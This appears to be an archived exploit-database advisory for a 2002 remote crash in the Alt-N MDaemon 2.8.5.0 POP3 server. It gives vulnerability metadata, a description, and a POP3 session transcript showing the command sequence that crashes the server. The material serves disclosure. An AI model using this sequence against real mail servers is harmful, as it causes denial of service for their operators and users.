Alt-N MDaemon 2.8.5.0 Remote Crash

vendor:

MDaemon

by:

SecurityFocus

7.5

CVSS

HIGH

Remote Crash

N/A

CWE

Product Name: MDaemon

Affected Version From: 2.8.5.0

Affected Version To: 2.8.5.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

Alt-N MDaemon 2.8.5.0 Remote Crash

A remote user is capable of crashing Alt-N MDaemon 2.8.5.0 by executing the pass command, then the UIDL command and quitting the mail server before the UIDL has returned a response. This must be done before the user is presented with the POP3 login banner. Restarting the application is required in order to regain normal functionality.

Mitigation:

Restarting the application is required in order to regain normal functionality.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1366/info

A remote user is capable of crashing Alt-N MDaemon 2.8.5.0 by executing the pass command, then the UIDL command and quitting the mail server before the UIDL has returned a response. This must be done before the user is presented with the POP3 login banner. Restarting the application is required in order to regain normal functionality. 

Perform the following very quickly:

+OK <target> POP service ready using MDaemon
v2.8.5.0 T

User <username>
+OK <username>... Recipient ok
pass <password>
-ERR that command is valid only in the AUTHORIZATION state!
uidl
-ERR unknown POP command!
quit
+OK
.
quit
+OK <username> <target> POP Server signing off (mailbox empty)